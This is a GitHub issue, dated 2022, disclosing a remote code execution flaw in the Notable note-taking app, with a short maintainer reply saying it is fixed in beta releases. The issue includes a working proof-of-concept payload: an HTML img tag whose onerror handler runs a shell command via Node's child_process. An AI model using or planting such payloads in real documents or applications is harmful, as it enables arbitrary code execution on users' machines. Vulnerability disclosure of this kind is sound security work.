Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

RCE Vulnerability in Notable #1595

Closed
Passenger-AMao opened this issue Feb 22, 2022 · 1 comment
Closed

RCE Vulnerability in Notable #1595

Passenger-AMao opened this issue Feb 22, 2022 · 1 comment

Comments

@Passenger-AMao
Copy link

author: AMao@Hillstone
Date: 2022-02-22

Text editing without filtering leads to arbitrary code execution

Payload:

<img src=# onerror="require('child_process').exec('whoami',(error, stdout, stderr)=>{
  alert(`stdout: ${stdout}`);
});">

eg.

image

@fabiospampinato
Copy link
Member

That's fixed in the betas https://github.com/notable/notable-insiders/releases/

Older releases are not maintained.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Development

No branches or pull requests

2 participants